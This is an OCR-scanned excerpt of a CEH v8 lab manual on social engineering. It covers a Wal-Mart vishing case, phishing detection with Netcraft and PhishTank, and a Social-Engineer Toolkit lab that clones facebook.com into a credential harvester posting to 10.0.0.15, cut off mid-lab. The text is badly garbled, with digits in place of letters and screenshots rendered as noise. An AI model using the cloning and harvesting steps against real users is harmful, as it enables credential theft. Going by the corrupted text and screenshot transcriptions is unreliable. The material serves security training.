Ceh v8 labs module 09 social engineering

CEH Lab Manual
Social Engineering
Module 09

Module 09 - Social Engineering
Social Engineering
Socialengineeringis the artof convincingpeople to revealconfidentialinfonmtion.
Lab Scenario
Source: http:/ / monev.cnn.com/2012/08/O‫/־־‬technology/walmart-hack-
deIcon/index.litni
Social engineering is essentially the art of gaining access to buildings, systems,
01‫־‬ data by exploiting human psychology, rather than by breaking 111 01‫־‬ using
technical hacking techniques. The term “social engineering” can also mean an
attempt to gain access to information, primarily through misrepresentation, and
often relies 011 the trusting nature of most individuals. For example, instead of
trying to find software vulnerability, a social engineer might call an employee
and pose as an IT support person, trying to tiick the employee into divulging
111s password.
Shane MacDougall, a hacker/security consultant, duped a Wal-Mart employee
into giving 111111 information that could be used 111 a hacker attack to win a
coveted “black badge” 111 the “social engineering” contest at the Deleon
hackers’ conference 111 Las Vegas.
111 tins year's Capture the Flag social engineering contest at Deleon, champion
Shane MacDougall used lying, a lucrative (albeit bogus) government contract,
and 111s talent for self-effacing small talk to squeeze the following information
out of Wal-Mart:
■ The small-town Canadian Wal-Mart store's janitorial contractor
■ Its cafeteria food-seivices provider
■ Its employee pay cycle
■ Its staff sliilt schedule
■ The time managers take then‫־‬breaks
■ Where they usually go for lunch
■ Type of PC used by the manager
■ Make and version numbers of the computer's operating system, and
■ Its web browser and antivirus software
Stacy Cowley at CNNMoney wrote up the details of how Wal-Mart got taken 111
to the extent of coughing up so much scam-worthy treasure.
Calling from 111s sound-proofed booth at Deleon MacDougall placed an
“urgent” call, broadcast to the entire Deleon audience, to a Wal-Mart store
manager 111 Canada, introducing liiinsell as "Gan‫־‬ Darnell" from Wal-Mart's
home oflice 111 Bentonville, Ark.
ICON KEY
/ Valuable
information
^ Test your
*5 Web exercise
£Q Workbook revie
Ethical H acking and Countenneasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]
C EH Lab M anual Page 675

The role-playing visher (visliing being phone-based phishing) told the manager
that Wal-Mart was looking at the possibility of winning a multimillion-dollar
government contract.
“Darnell'’ said that 111s job was to visit a few Wal-Mart stores that had been
chosen as potential pilot locations.
But first, he told the store manager, he needed a thorough picture of how the
store operated.
111 the conversation, which lasted about 10 minutes, “Darnell” described
himself as a newly lured manager of government logistics.
He also spoke offhand about the contract: “All I know is Wal-Mart can make a
ton of cash off it,” he said, then went on to talk about his upcoming visit,
keeping up a “steady patter” about the project and life 111 Bentonville, Crowley
writes.
As if tins wasn't bad enough, MacDougall/Darnell directed the manager to an
external site to fill out a survey 111 preparation for 111s upcoming visit.
The compliant manager obliged, plugging the address into 111s browser.
When his computer blocked the connection, MacDougall didn't miss a beat,
telling the manager that he'd call the IT department and get the site unlocked.
After ending the call, stepping out of the booth and accepting 111s well-earned
applause, MacDougall became the first Capture the Flag champion to capture
even‫״‬ data point, or flag, on the competition checklist 111 the three years it has
been held at Defcon. Defcon gives contestants two weeks to research their
targets. Touchy information such as social security numbers and credit card
numbers are verboten, given that Defcon has no great desire to bring the law
down on its head.
Defcon also keeps its nose clean by abstaining from recording the calls, which
is against Nevada law. However, there's no law against broadcasting calls live to
an audience, which makes it legal for the Defcon audience to have listened as
]MacDougall pulled down Wal-Mart's pants.
MacDougall said, “Companies are way more aware about their security. They’ve
got firewalls, intrusion detection, log-in systems going into place, so it’s a lot
harder for a hacker to break 111 these days, or to at least break in undetected. So
a bunch of hackers now are going to the weakest link, and the link that
companies just aren’t protecting, which is the people.”
MacDougall also shared few best practices to be followed to avoid falling victim
to a social engineer:
■ Never be afraid to say no. If something feels wrong, something is
wrong
■ A11 IT department should never be calling asking about operating
systems, machines, passwords or email systems— they already know
Ethical H acking and Countermeasures Copyright © by EC-Council

■ Set up an internal company security word of the day and don’t give any
information to anyone who doesn’t know it
■ Keep tabs 011 what’s 011 the web. Companies inadvertently release tons
of information online, including through employees’ social media sites
As an expert ethical hacker and penetration tester, you should circulate the
best practices to be followed among the employees.
Lab Objectives
The objective of this lab is to:
■ Detect phishing sites
■ Protect the network from phishing attacks
To earn* out tins lab, you need:
■ A computer mmnng Window Seiver 2012
■ A web browser with Internet access
Lab Duration
Time: 20 Minutes
Overview Social Engineering
Social engineering is die art of convincing people to reveal confidential information.
Social engineers depend 011 the fact that people are aware of certain valuable
information and are careless 111 protecting it.
Lab Tasks
Recommended labs to assist you 111 social engineering:
■ Social engineering
■ Detecting plushing using Netcraft
■ Detecting phishing using PliishTank
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion 011
your target’s security posture and exposure.
P L E A S E T AL K T O Y O U R I N S T R U C T O R IF Y O U H A V E Q U E S T I O N S
R E L A T E D T O T H I S LAB.
& T ools
demonstrated in
this lab are
available in
D:CEH-
ToolsCEHv8
Module 09 Social
Engineering
» TASK 1
Overview

Delecting Phishing Using Netcraft
Netrmftprovides n‫׳‬ebserverandn‫׳‬ebhostingwarket-share analysis, including n'eb
serverand operatingsystem detection.
Lab Scenario
By now you are familiar with how social engineering is performed and what sort
ot information can be gathered by a social engineer.
Phishing is an example of a social engineering technique used to deceive users,
and it exploits the poor usability of current web security technologies.
Phishing is the act of attempting to acquire information such as user names,
passwords, and credit card details (and sometimes, indirectly, money) by
masquerading as a trustworthy entity in an electronic communication.
Communications claiming to be from popular social websites, auction sites,
online payment processors, 01‫־‬IT administrators are commonly used to lure the
unsuspecting public. Phishing emails may contain links to websites that are
infected with malware. Phishing is typically carried out by email spoofing 01‫־‬
instant messaging and it often directs users to enter details at a fake website
whose look and feel is almost identical to the legitimate one.
Phishers are targeting the customers of banks and online payment services.
They send messages to the bank customers by manipulating URLs and website
forgerT. The messages sent claim to be from a bank and they look legitimate;
users, not realizing that it is a fake website, provide their personal information
and bank details. Not all phishing attacks require a fake website; messages that
claim to be from a bank tell users to dial a phone number regarding problems
with their bank accounts. Once the phone number (owned by the plusher, and
provided by a Voice over IP service) is dialed, it prompts users to enter their
account numbers and PIN. Vishing (voice phishing) sometimes uses fake caller-
ID data to give the appearance that calls come from a trusted organization.
Since you are an expert ethical hacker and penetration tester, you must be
aware of phishing attacks occurring 011 the network and implement anti-
phishing measures. 111 an organization, proper training must be provided to
people to deal with phishing attacks. 111 this lab you will be learning to detect
phishing using Netcraft.
ICON KEY
/Valuable
information
v Test your.‫*־‬‫״‬
*a Web exercise
ffi! Workbook revi!

Lab Objectives
Tins k b will show you phishing sites using a w eb brow ser and show you how to
use them . It will teach you how to:
■ D etect phishing sites
■ P rotect the netw ork from phishing attack
T o carry o ut tins lab you need:
■ Netcraft is located at D:CEH-ToolsCEHv8 Module 09 Social
EngineeringAnti-Phishing ToolbarNetcraft Toolbar
■ Y ou can also dow nload the latest version o f Netcraft Toolbar from the
link h ttp ://to o lb ar.n etcralt.co m /
■ If you decide to dow nload the latest version, then screenshots show n
111 the lab m ight differ
■ A com puter running W indow s Server 2012
■ A w eb brow ser (Firefox, Internet explorer, etc.) w ith Internet access
■ A dm inistrative privileges to run the N etcralt toolbar
Lab Duration
Time: 10 Minutes
Overview of Netcraft Toolbar
N etcraft Toolbar provides Internet security services, including anti-fraud and
anti-phishing services, application testing, code reviews, autom ated penetration
testing, and research data and analysis on m any aspects o f the Internet.
Lab Tasks
1. T o start this lab, you need to launch a w eb brow ser first. 111 this lab we
have used Mozilla Firefox.
2. Launch the Start m enu by hovering the m ouse cursor on the low er-left
corner o f the desktop.
^ ~ T o o l s
demonstrated in
this lab are
available in
D:CEH-
ToolsCEHv8
Module 09 Social
Engineering
^ T A S K 1
Anti-Phishing Tool
bar
Ethical H acking and Countem ieasures Copyright © by EC-Council

JL
5‫״‬
* | Windows Server2012
Wiwfciwo“erfci2012IUIc.mC1n4llMI( Dot*c«nV
tiftlaatoncopv BmOMW
Q = J Y o u cau also
download the Netcraft
toolbar form
http://toolbar.netcraft.com
FIGURE 1.1: Windows Server 2012-Start Menu
3. Click the Mozilla Firefox app to launch the browser.
FIGURE 1.2: Windows Server 2012-Start Menu Apps view
4. T o dow nload the Netcraft Toolbar for Mozilla Firefox, enter
h ttp :// toolbar.netcraft.com in the address bar o f the brow ser or drag
and drop the netcraft_toolbar-1.7-fx.xpi file in Firefox.
5. 111 tins lab, we are dow nloading the toolbar Irom the Internet.
6. 111 Firefox brow ser, click Download the Netcraft Toolbar to install as
the add-on.
SINGLEH3 P ■‫ן‬ n , ,
^ ‫ןזח‬
‫ת‬ etcMi ft
M»tc‫»-׳‬ft Toolbar
•‫■׳‬
Why utt tn• Noicratt Toolbar?
U Protect your tavinQf IromI'hMhtnq attack*,
a s«« the hoittnq totat)or1and UkfcMatatq 01«‫י‬
O I1*lpdefend 11*0Internet communitytrooi tra
FIGURE 1.3: Netcraft toolbar downloading Page
Netcraft provides
Internet security services,
including anti-fraud and
anti-phishing services.

7. O n the Install page o f the N etcraft T oolbar site, click the Firefox
image to continue w ith installation.
fc 4 c P f t O l
1
nETCI^AFT
‫״‬» ‫־‬,.(■. D ow nload Now
Netcraft Anti Phithing Toolbar
&
CQQ1 Netcraft is an
System Raqiilramania
FIGURE 1.4: Netcraft toolbar Installation Page
8. Click Allow to dow nload N etcraft Toolbar.
^ ‫ז‬*»‫סי‬« at■10c*«.ne<r<ft<0»)lo*n
SNGLEH2r
1■-‫-־‬1
Hctcraft Teotbir D ow nload Now
N*te«H Antl-PN«hl0<‫׳‬ Todhtr
SystamKaquirtrranti
>r>a*pl«tfc#rre(AMnn/HMnji)
r=rs a
'oolba• <uppor‫׳‬
« cwitnnrva>«.*‫׳‬sicnsorthetoo&ar 1«r or«e roujrg ««>« tuw « oo«‫׳‬a.andMian
roMom•inat«llinQ?fm • ••idat#1..I.II.1.‫״־‬«mU.
« alsoha»»a8»t«t1«n0»tutofwis<youWirttog«tt*em«toa tf»• 1wanrttoofcae
Help&Support
FIGURE 1.5: Netcraft toolbar Installation-Allow button
9. W hen the Software Installation dialog box appears, click Install Now.
Software Installation
Install add-ons only from authors whom you trust.
Malicious software can damage your computer or violate your privacy.
You have asked to install the following item:
Netcraft Anti-Phishing Toolbar (Netcraft Ltd)
http://releases.mozilla.org/pub/mozilla.org/addons/1326/netcraft_toolbar-1.5-fx.xpi
Install N ow Cancel
FIGURE 1.6: Installing Netcraft Toolbar
10. T o com plete the installation it will ask you to restart the brow ser. Click
Restart Now.
Internet services company
based in Bath, England.
£ Q Netcraft Toolbar
provides a wealth of
information about the sites
you visit.

■A• <onotafrcnttf K
Help&Support
• l*1gUHnImlnilMiuf1‫׳‬lr«m*■■•IUJ4InilaMu• *Mr
‫י‬ Ao jlech1v«jMlaclKMx/iito ijit tfyou• i t «0with* non <ut019‫•י‬ M M toabJt
• o«t 1Oimmh'it>n<vM«n1w4r«dn airMtUhMOir (juMOtm
FIGURE 1.7: Restarting Firefox browser
11. Netcraft Toolbar is now visible. O nce the Toolbar is installed, it looks
similar to the follow ing figure.
p * ‫ם‬ -
J1U---- >«rw•t font Hill•
FIGURE 1.8: Netcraft Toolbar on Mozilla Firefox web browser
12. W hen you visit a site, the following inform ation displays 111 the T oolbar
(unless the page has been blocked): Risk rating, Rank, and Flag.
13. Click Site Report to show the report o f the site.
FIGURE 1.9: Report generated by Netcraft Toolbar
14. If you attem pt to visit a page that has been identified as a pliishing page
by N etcraft T oolbar you will see a warning dialog that looks similar to
the one in the following figure.
15. Type, as an example:
http: / / www.pavpal.ca.6551 .secure7c.m x / images / cgi.bin
l.__ Risk Rating displays die
trustworthiness of die current
0=5!Sitereportlinks to :
detailedreport fordie

FIGURE 1.10: Warning dialog for blocked site
16. If you trust that page click Yes to open it and if you d o n ’t, click No
(Recommended) to block that page.
17. If you click No the following page will be displayed.
£ 0 . Phishing a site feeds
0011011x1011517updated
encrypted database of
patterns diat match phishing
URLs reported by the
Netcraft Toolbar.
c Coofb fi ft C -
PhKMng S*o Hlockcxl.!■!•!!‫■!ר‬
%lll t‫־‬‫־‬»
.......- :m ; .
L ■
FIGURE 1.11: Web page blocked by Netcraft Toolbar
Lab Analysis
D ocum ent all die results and report gathered during die lab.
T o o l/U tility In fo rm a tio n C o lle c te d /O b je c tiv e s A ch iev ed
N e tc ra ft ■ Phishing site detected
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS
RELATED TO THIS LAB.
Questions
1. Evaluate w hether the N etcraft T oolbar w orks if you use a transparent
proxy.

2. D eterm ine it you can m ake the N etcraft T oolbar coexist on the same
line as other toolbars. If so, how?
3. H ow can you stop the T oolbar w arning if a site is trusted?
In te rn e t C o n n e c tio n R e q u ire d
P latfo rm S u p p o rte d
0 C lassro o m
□ N<
□ !Labs

3Detecting Phishing Using
PhishTank
PhishTank is a collaborative clearinghousefor data andinformation regarding
phishing ontheInternet.
Lab Scenario
Phishing is an attem pt by an individual 01‫־‬ group to solicit personal inform ation
from unsuspecting users by em ploying social engineering techniques. Phishing
emails are crafted to appear as if they have been sent from a legitimate
organization 01‫־‬ know n individual. These emails often attem pt to entice users to
click 011 a link that will take the user to a fraudulent w ebsite that appears
legitimate. H ie user then m ay be asked to provide personal inform ation such as
account user nam es and passw ords that can further expose them to future
com prom ises. Additionally, these fraudulent w ebsites m ay contain m alicious
code.
W ith the trem endous increase 111 the use o f online banking, online share trading,
and ecom m erce, there has been a corresponding grow th 111 the incidents o f
phishing being used to carry out financial trauds. Phisliing involves fraudulently
acquiring sensitive inform ation (e.g. passw ords, credit card details etc.) by
m asquerading as a m asted entity.
111 the previous lab you have already seen how a phishing site can be detected
using the N etcraft tool.
T he usual scenario is that the victim receives an email that appears to have been
sent from 111s bank. T he em ail urges the victim to click 011 the link 111 the email.
W hen the victim does so, he is taken to “a secure page 011 the bank’s w ebsite.”
T he victim believes the w eb page to be authentic and he enters 111s user nam e,
passw ord, and other inform ation. 111 reality, the w ebsite is a fake and the
victim ’s inform ation is stolen and m isused.
Being an adm inistrator 01‫־‬ penetration tester, you m ight im plem ent all the m ost
sophisticated and expensive technology solutions 111 the w orld; all o l it can be
bypassed if your em ployees fall for sim ple social engineering scams. It becom e
I C O N K E Y
Valuable
information____
Test your*.‫־‬>
gfe Web exercise
Workbook r‫׳‬e‫־‬

your responsibility to educate em ployees 011 best practices for protecting
inform ation.
Phishing sites 01‫־‬ emails can be reported to plusl11ng-report@ us-cert.gov
http: / / w w w .us-cert.gov/ 11a v /re p o rt p h 1sh111g.htm l
U S-C E R T (U nited States C om puter Em ergency Readiness Team ) is collecting
phishing email m essages and w ebsite locations so that they can help people
avoid becom ing victim s o f phishing scams.
Lab Objectives
[CTTools
demonstrated in
this lab are
available in
D:CEH-
ToolsCEHv8
Module 09 Social
Engineering
This lab will show you how to use phishing sites using a w eb brow ser. It will
teach you how to:
■ D etect phishing sites
■ P rotect the netw ork from phishing attacks
Lab Environment
T o carry out the lab you need:
■ A com puter running W indow s Server 2012
■ A w eb brow ser (Firefox, Internet Explorer, etc.) w ith Internet access
Lab Duration
Tune: 10 Minutes
Overview of PhiskTank
£ Q PhishTank URL: PhishTank is a free community site w here anyone can submit, verify, track, and
h ttp .//www.phishtank.com s!1are phishing data. PhishTank is a collaborative clearing house for data and
inform ation regarding phishing 011 the Internet. Also, PhishTank provides an open
API tor developers and researchers to integrate anti-phishing data into their
applications at 110 charge.
Lab Tasks
1. T o start this lab you need to launch a w eb brow ser first. 111 this lab we
have used Mozilla Firefox.
2. Launch the Start m enu by hovering the m ouse cursor 011 the low er-left
corner o f desktop.
m. T A S K 1
PhishTank

jw
$
23 Windows Server 2012
Wndowaicrrct2012IUIe.mC«>vl!uatrD*t*cn»
b<alMloncopy Hu!aMW‫׳‬
- g • *fa
FIGURE 2.1: Windows Server 2012-Start Menu
3. Click the Mozilla Firefox app to launch the browser.
FIGURE 2.2: Windows Server 2012-Start Menu Apps view
4. Type http://www.phishtank.com in the address bar o f the w eb brow ser
and press Enter.
/ing5. Y ou will see the follow
PhishTank ‫,.י.״,.־‬
Join tie fiy lita y a iittt pliialiiiK j
Sdbmrtstsopdfdohshes Trackthe Uatis of/a ir suhmfyaons
Verfy <Acr jsen'submaaton.Develop software with our freeAPI.
Recert Subrissbrs
1S7:£S1 rtnJ «r»n rmjmagei/<atvj
^*®:/VrstM.axVsy
lgliia rtc usemncs.aebfu.ictscmnsraurAxroim
m.cvn’PM/iMlct.Kni
£01 PlushTank provides an
open API for developers and
researchers to integrate anti-
phishing data into dieir
applications at no charge.
FIGURE 2.3: Welcome screen of PhishTank
Ethical H acking and Countem ieasures Copyright © by EC-Council

6. Type the w ebsite URL to be checked for phishing, for exam ple,
http: / / sdapld21.host21.com .
7. Click Is it a phish?.
*MhTinkprovttet»‫׳‬ oh‫״‬Antar
Jointhefightagainstphishing
Submrt tu w c» d pheftea. ‫־‬Rack the ttatic of1/cursubmissions
Verfyongf jserV suonssons Develop software wtthourftee API.
jntp //Kijptav.itMtucem
R#c*r» SubriKtors
■dim)feat)lu>miftHim»u»p«>-le0pirn
'wcpcfcetMlr-drccint‫׳‬‫״‬‫י‬‫י‬Tfl-34CTdY..
PliishTauk 1s operated
by Open DNS to improve
the Internet through safer,
faster, and smarter DNS.
FIGURE 2.4: Checking for site
If the site is a phishing site, you see the following w arning dialog box.
PhishTank Okof it*NM.i«o*MTw*
Submission #1571567 is aimentty ONLINE
S01 n or Hcgcto‫׳‬ tovert, t !6sutxnsstor.
No screenshot yet
We have net yet successfully taken
a screeasltol •f the submitted website.
FIGURE 2.5: Warning dialog for phishing site
Lab Analysis
D ocum ent all die websites and verify w hether diey are phishing sites.
0 2 Open DNS is
interested in having die
best available information
about phishing websites.
P h is k T a n k ■ Phishing site detected

Questions
1. Evaluate w hat PliisliTank w ants to hear about spam.
2. D oes PliisliTank protect you from phishing?
3. W hy is O pen D N S blocking a plush site that PliisliTank doesn't list or
has n o t vet ventied?
In te rn e t C o n n e c tio n R e q u ired
0 Y es
0 C lassro o m
□ N o
□ !Labs

3Social Engineering Penetration
Testing using Social Engineering
Toolkit (SET)
The Socia/-EngineerToolkit (SET) is an open-source ‫־‬Python-driven toolaimedat
penetration testingaroundsocialengineering
■con key Lab Scenario
Social engineering is an ever-grow ing threat to organizations all over the world.
Social engineering attacks are used to com prom ise com panies even‫־‬ dav. E ven
though there are m any hacking tools available w ith underground hacking
com m unities, a social engineering toolkit is a boon for attackers as it is freely
available to use to perform spear-pliishing attacks, w ebsite attacks, etc.
A ttackers can draft em ail messages and attach m alicious files and send them to
a large num ber o f people using the spear-phishing attack m ethod. Also, the
m ulti-attack m ethod allows utilization o f the Java applet, M etasploit brow ser,
C redential H arvester/ Tabnabbing, etc. all at once.
T hough num erous sorts o l attacks can be perform ed using tins toolkit, tins is
also a m ust-have tool for a penetration tester to check for vulnerabilities. SET is
the standard for social-engineering penetration tests and is supported heavily
w ithin the security com m unity.
As an ethical hacker, penetration tester, or security administrator, you
should be extrem ely familiar w ith the Social Engnieering T oolkit to perform
various tests for vulnerabilities 011 the netw ork.
Lab Objectives
T he objective o f tins lab is to help students learn to:
■ Clone a w ebsite
■ O btain user nam es and passw ords using the Credential H arvester
m ethod
■ G enerate reports for conducted penetration tests
£_ Valuable
information
s Test your
knowledge
Web exercise
m Workbook review

Lab Environment
T o earn’ out die k b , you need:
■ Run this tool 111 BackTrack Virtual M aclune
■ W eb browser with Internet access
■ Administrative privileges to m n tools
Lab Duration
Tune: 10 Minutes
Overview of Social Engineering Toolkit
Social-Enguieer Toolkit is an open-source Python-driven tool aimed at penetration
testing around Social-Engineering. Tlie (SET) is specifically designed to perform
advanced attacks against die hum an element. Tlie attacks built into die toolkit are
designed to be targeted and focused attacks against a person or organization used
during a penetration test.
Lab Tasks
1. Log in to your BackTrack virtual maclune.
2. Select Applications ‫^־־‬ BackTrack ‫^־־‬ Exploitation Tools ‫^־־‬ Social
Engineering Tools ‫^־־‬ Social Engineering Toolkit and click Set.
& Tools
demonstrated in
this lab are
available in
D:CEH-
ToolsCEHv8
Module 09 Social
Engineering
T A S K 1
Execute Social
Engineering
Toolkit
3 Tue Sep 25. 7:10 PM^ Applications[ Places System [>7]
a9 BEEF XSS Framework
9 MoneyPots
11• Social Engineering Toolkit
f * Network Exploitanor Tools.-
Web Exploitation Tools
^Database Exploitation Tools
Wireless Exploitation Tools
|9social E’ jifM
Physical Exploitation
3Open Source E xp loite d ,h set‫י‬
|Q ^ Information Gathering
r■ vulnerability Assessment
J0 Exploitation Tools
Privilege Escalation
E f Maintaining Access
^ Reverse Engineering
I RFID100IS
O
Forensics
KCporting Tools
c P services
y Miscellaneous ►
<< back track
FIGURE 3.1: Launching SET in BackTrack
C EH Lab M anual Page 691 Etliical H acking and Countermeasures Copyright © by EC-Council

3. A Terminal w indow for SET will appear. Type y and press Enter to
agree to the term s o f service.
File Edit View Terminal Help
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The above lic e n s in g was taken from the BSD lic e n s in g and^is app lied toSo cial-E n
g in eer T o o lk it as w e ll. ___ " * ^ 1
Note th a t the S o cial-E n g in ee r T o o lk it is provided as is , and is 3 ro y a lty fre e 0
pen-source a p p lic a tio n . M r
Feel fre e to m odify, use, change, m arket, do whatever § u want w ith i t a f long a
s you give the ap p ro p riate c re d it where c re d it
is due (which means g iv in g the authors the c re d it they ifeserve fo r w ritin g i t ) .
Also note th a t by using th is softw are, i f you ever
see the c re a to r o f SET in a bar, you are required to g ive him a hugand buy him
a beer. Hug must la s t a t le a s t 5 seconds. Author
holds the rig ftt to refipse the hug or the b e e r.■ f | ‫ן‬ ^
f lo t'B k il. I f youare
1 J ‫׳‬ou are v io la t
tin q X
n a ty o u w il l only us
T ^ ^ * c M 1- E t l^ e e r T A lk it W s rfT iig fliiJ p y e ly good pn<r
if l a op I^ S 4a t h * t o o l f o f l rcaj f c j B u ^ p u r J ^ e t h a r ^ r c
n W c ra th O T ftfl b^thel:om pany*ym j a re ^ re rfO T ll™ a ^ e s s « e rr^
ing th e terms o f s e r v ie and lic e n s e o f th is to o ls e t. B^ , r t
yes (o n ly one tim e ), you agree to the terms o f serv ic e a n d T
e th is to o l fo r la w fu l purposes on ly.
FIGURE 3.2: SET Service Agreement option
4. Y ou will be presented will a list o f m enus to select the task. Type 1 and
press Enter to select the Social-Engineering Attacks option.
Homepage: http s://w w w .trusted sec.com [
Welcome to the S o cial-E n g in ee r T o o lk it (SETJj.Your one
stop shop fo r a l l of your s o c ia l-e n g in e e rin g n e e d s .^ ,
Join us on irc .fre e n o d e .n e t in channel # s e « J o lk it
The S o cial-E n g in ee r T o o lk it is a product o f TrustedSec.
V is it: h ttp s://w w w .trusted 5ec.com
S e lect from the menu:
J 1) Social-Engineering Attacks I _
2) Fast-Track P e & tra tio n T e s tin g
3 ‫י‬ T h ir d p.nrty Modules
4) Update the M eta sp lo it Sranei/ork
5) Update the S o cial-E n g in ee r T o o lk it
6) Update SET c o n fig u ra tio n
7) Help, C re d its , and About
99) E x it the S o cial-E n g in ee r T o o lk it
FIGURE 3.3: SET Main menu
5. A list o f m enus 111 Social-Engineering A ttacks will appear; type 2 and
press Enter to select W ebsite Attack Vectors.
ff is E T has been
presented at large-scale
conferences including
Blackhat, DerbyCon,
Defcon, and ShmooCon.
£ Q t 11e webjacking attack
is performed by replacing
the victim’s browser with
another window that is
made to look and appear to
be a legitimate site.
ff is E T allows you to
specially craft email
messages and send them to
a large (or small) number of
people with attached file
format malicious payloads.

« Term inal
Join us on irc .fre e n o d e .n e t in channel # se to o lk1t
The S o cial-E n g in ee r T o o lk it is a product o f TrustedSec.
V is it: h ttp s://w w w .trusted sec.com
S e lect from the menu:
1) Spear-Phishinq A ttack Vecto rs
| 2) Website A ttack Vectors |
3) In fe c tio u s Media Generator
4) C reate a Payload and L is te n e r
_ 5) Hass M a ile r A ttack ‫ן‬ _
I 6) Arduino-Based A ttack vec to r g
|^ % S M S Spoofing A ttack V e c t o r ♦ ^ I A
8) W ireless Access Point A ttack Vector
9 ) QRCode Generator A tta c | Vector
10) Powershell A ttack V e c tlrs
11) T h ird P a rty Modules
99) Return back to the main menu.
>r5s _______________________________
ack
U
1) Java Applet A ttack Method
2) M eta sp lo it Browser E x p lo it Method
I3) Credential Harvester Attack Method |
4) Tabnabbing Attack Method
5) Man l e f t in the M iddle A ttack Method
6) Web Jacking A ttack Method
7) M u lti-A ttack Web HethoJ
8) V ictim Web P r o file r
9 ) C reate or import a CodeSigning C e rtific a te
9 9 ) Return to Main Menu
s e t:webattackj3B1
FIGURE 3.4: Social Engineering Attacks menu
6. 111 the next set o f m enus that appears, type 3 and press Enter to select
the Credential Harvester Attack Method
and the Back|Track team. This method u t iliz e s !fram e replacements to
make the h ig h lig h ted URL lin k to appear le g itim a te however *tf1en click ed
a window pops up then is replaced w ith the m alicious lin k . You can e d it
the lin k replacement s e ttin g s in the set^conFig i f i t s tonfc*ko«/fast.
The M u lti-A tta c k method w il l add a combination of attacks through the web a tta c
k J r
menu. For example you can u t iliz e the Java A p plet, M e ta s p lo it Browser,
C red en tial Harvester/Tabnabbing, and the Man L e ft in the M iddle atta c k
a l l a t once to see which is successful. m .
FIGURE 3.5: website Attack Vectors menu
7. N ow , type 2 and press Enter to select the Site Cloner option from the
menu.
C Q t i!e Social-Engineer
Toolkit "Web Attack"
vector is a unique way of
utilizing multiple web-
based attacks in order to
compromise the intended
victim.
0 3 T11e Credential
Harvester Method will
utilize web cloning of a
website that has a username
and password field and
harvest all die information
posted to die website.

« Term inal
9) C reate or im port a CodeSigning M
99) Return to Main Menu
s e t:w ebattack>3
The f i r s t method w il l a llo w SET to import‫׳‬ '!* l i s t o f p re-d efin ed web
ap p lic a tio n s th a t i t can u t il i z e w ith in the a tta c k .
The second method w il l com pletely clone a w ebsite o f your choosing
and allo w you to u t il i z e the a tta c k vectors w ith in the com pletely
same web a p p lic a tio n you were attem p ting to clone.
Ih e th ir d method aUows yo u jto im port your own w ebsip;, note t^ a t you
Should only have alt' index.htm l when using the import W ebsite
fu n c tio n a lity ^ ^ * Y jF ♦ ^ I V •) / ‫׳‬ ‫י‬
1) Web Templates v I ^ 3 4
12) S ite C lo n e r! I
3) Custom Import - ■«‫״‬
99) Return to Webattack Menu
;et:w eb atta ckaE f|_______________
C Q t 11e Site Cloner is used
to done a website of your
choice.
FIGURE 3.6: Credential Harvester Attack menu
Type the IP address o f your BackTrack viruial PC 111 the p ro m p t tor IP
address for the POST back in Harvester/Tabnabbing and press Enter.
111 tins exam ple, the IP is 10.0.0.15
*
* Term inal
a p p lic a tio n s th a t i t can u t il i z e w ith in th e a tta c k .
The second method w il l com pletely clone a w ebsite o f your choosing
and a llo w you to u t il i z e the a tta c k vectors w ith in the com pletely
same web a p p lic a tio n you were attem p ting to clo n e.
The th ir d method allow s you to im port your own w ebsite, note th a t you
should only have an in d ex.h tm l when using the im port w ebsite
fu n c tio n a lity .
1) Web Templates
2) S ite Cloner
3) Custom Im port _ '
199 ) Return to W ebAtack Menu I / . * | ^
J[jLS‫־‬ir br r 3t-1 C re d e n tia l h arve ste r w ilt allo w you to u t il i z e th e clone c a p a b ilitie s w ith in
se t ‫ן‬ J
[-1 to harvest c re d e n tia ls or parameters from a w ebsite as w e ll as piece them in
to a report
[-1 This option is used fo r what IP the server w i l l POST to .
[-J I f y o u 're using an e x te rn a l IP , use your e x te rn a l IP fo r th is
: > IP address for the POST back in Harvester/Tabnabbina:110.0.0.15|
FIGURE 3.7: Providing IP address in Harvester/Tabnabbing
N ow , you will be prom pted for a U RL to be cloned, type the desired
U RL for Enter the url to clone and press Enter. 111 tins exam ple, we
have used www.facebook.com . Tins will nntiate the cloning o f the
specified website.
COSt 11e tabnabbing attack
method is used when a
victim has multiple tabs
open, when the user clicks
die link, die victim will be
presented with a “Please
wait while the page loads”.
When the victim switches
tabs because he/she is
multi-tasking, the website
detects that a different tab
is present and rewrites die
webpage to a website you
specify. The victim clicks
back on the tab after a
period of time and diinks
diey were signed out of
their email program or their
business application and
types the credentials in.
When the credentials are
inserts, diey are harvested
and the user is redirected
back to the original
website.
C EH Lab M anual Page 6 9 4

* Term inal
and allo w you to u t il i z e the a tta c k vectors w ith in the com pletely
same web a p p lic a tio n you were attem p ting to c l o n e T ^ ^ ^ ^ ^ ^ ^
The th ir d method allow s you to im p o rt-ym jr own w eb site, note th a t you
should only have an in dex.htm l when using the im port w ebsite
fu n c tio n a lity .
u t il i z e th e clone c a p a b ilitie s w ith ir
1) Web Templates
2) S ite Cloner
3) Custom Import
:webattack>2 —
hat IP the server w il l POST to .
[ • ] C re d e n tia l h arve ste r w il l allo w you to
J r > 1 T J T[ ‫־‬ ] to harvest c re d e n tia ls or parameters f
3r A
rom a w ebsite as w e ll as place them ir
to a re p o rt I ^ ■ % I % ■ I V J 1
[-] This option is used fo r |h a t IP the server w il l POST to . V ^ M
[■] I f y o u 're using an e x te rn a l IP , use your e x te rn a l IP fo r t h is
s e t:webattack> IP address fo r the POST back in H arvester/Tab nabbing:1 0 . 0 . 0 . 1 5
[ • ] SET supports both HTTP and HTTPS
[ - ] Example: h t tp ://www. th is is a fa k e s it e . com____________
;e t :w ebattack> Enter the u r l to c lo n e :Rvww. facebook. com!
FIGURE 3.8: Providing URL to be cloned
10. A fter cloning is com pleted, the highlighted message, as show n 111 the
following screenshot, will appear on the Terminal screen o t SET. Press
Enter to continue.
11. It will start Credential Harvester.
s e t:w ebattack>2 51
[-1 C re d e n tia l h arve ste r w il l allo w you to u t il i z e the clone c a p a b ilitie s w ith in
SET
[ - ] to harvest c re d e n tia ls or parameters from a w ebsite as w e ll as place them in
to a report
[ - ] This option is used fo r what IP the server w i l l POST to .
t-J I f y o u 're using an e x te rn a l IP , use your e x te rn a l IP fo r th is
s e t:w ebattack> IP address fo r the POST back in H arvester/T ab n ab b in g :10.0.0.1 5
